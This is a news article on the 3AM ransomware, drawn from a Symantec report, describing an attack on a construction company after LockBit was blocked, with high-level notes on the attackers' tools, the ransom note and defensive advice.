In a recent incident, a construction company fell victim to a cyber attack in which hackers attempted to deploy the LockBit ransomware but were unsuccessful. However, they didn’t give up and instead deployed a never-before-seen ransomware named 3AM, which managed to break through the defenses of the target network.
The new ransomware, 3AM, follows a similar pattern to other ransomware attacks. It blocks various cybersecurity and backup-related software and encrypts the files on the victim’s computer. However, what sets it apart is its unique theme – the use of 3 a.m. as a reference point. This time is typically associated with insomniacs, night owls, and hackers who are still active and working during those hours.
According to a report by Symantec, researchers observed the first use of 3AM in a double-whammy attack, where the LockBit ransomware was initially blocked but 3AM managed to infiltrate and compromise one machine. Dick O’Brien, the principal intelligence analyst for the Symantec threat hunter team, warns that organizations should expect attackers to use multiple ransomware families in their attacks.
Upon gaining access to the target network, the threat actors behind the attack started collecting user information and deploying data harvesting tools. They used tools like Cobalt Strike and PsExec to escalate privileges and ran commands to gather network status and identify other servers for lateral movement. They also added a new user for persistence and uploaded the victim’s files to their own file transfer protocol (FTP) server using the Wput utility.
The attackers intended to deploy LockBit, a popular ransomware-as-a-service, but their plans were foiled by the target’s robust cybersecurity protections. However, they had a backup plan in the form of 3AM. This ransomware appends encrypted files with the suffix “.threeamtime” and references the time of day in its ransom note. The note taunts the victim, claiming that all files are encrypted and backups have disappeared, but they can restore everything quickly if a ransom is paid.
While the ransom note may be creative, the malware itself shows less innovation. 3AM is a 64-bit executable written in Rust, a coding language increasingly favored by hackers and defenders alike. It attempts to kill various security and backup-related software on the host machine and then proceeds to scan the disk, identify specific file types, encrypt them, drop the ransom note, and delete any Volume Shadow Backup copies that could potentially help the victim recover their files.
The attackers managed to deploy 3AM on three machines, but it was blocked on two of them. However, it successfully penetrated the third machine where LockBit was ineffective. Dick O’Brien suggests that this success may be due to 3AM being a previously unseen threat, whereas LockBit is more well-known. The hackers claim to have stolen sensitive data from the compromised machine, but Symantec could not verify this claim.
In the face of ransomware attacks, O’Brien advises organizations to adopt a defense-in-depth strategy. It is crucial to address all stages of a potential attack and not just focus on blocking the payloads. Early detection and prevention are key to mitigating the impact of such attacks.
As cybercriminals continue to evolve their tactics, organizations must remain vigilant and implement robust cybersecurity measures to protect themselves against ransomware attacks. The ability to detect and respond to threats promptly can make a significant difference in minimizing the damage caused by these malicious actors.